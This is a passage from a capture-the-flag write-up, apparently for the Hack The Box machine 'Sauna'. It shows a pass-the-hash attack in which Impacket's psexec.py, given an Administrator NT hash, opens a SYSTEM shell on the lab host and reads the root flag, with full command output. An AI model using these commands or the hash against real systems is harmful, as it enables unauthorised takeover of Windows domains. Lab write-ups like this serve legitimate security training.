Now that I have the Administrator NT hash I do not need the cleartext password at all: psexec accepts -hashes LM:NT (the aad3b435... half is the empty-LM placeholder) and authenticates with the hash directly. Note that psexec lands us as NT AUTHORITY\SYSTEM rather than Administrator, because it works by uploading a service binary to ADMIN$ and starting it through the Service Control Manager:
root in impacket/examples on master via python v2.7.17 ❯ python psexec.py EGOTISTICALBANK/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff -target-ip 10.10.10.175
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file GWcAFdKS.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service iwyN on 10.10.10.175.....
[*] Starting service iwyN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami & hostname
nt authority\system
SAUNA

C:\Windows\system32>
Grab the root.txt
Now that I am SYSTEM I can read root.txt:
C:\Windows\system32>cd \Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\Administrator\Desktop

01/23/2020  04:11 PM    <DIR>          .
01/23/2020  04:11 PM    <DIR>          ..
01/23/2020  11:22 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,681,822,720 bytes free

C:\Users\Administrator\Desktop>more root.txt
04965c68

C:\Users\Administrator\Desktop>
If you liked my writeup please leave a respect on my Profile
References:
- AS-REP roasting
- GetNPUsers (Impacket)
- BloodHound
- WinPEAS
- secretsdump (Impacket)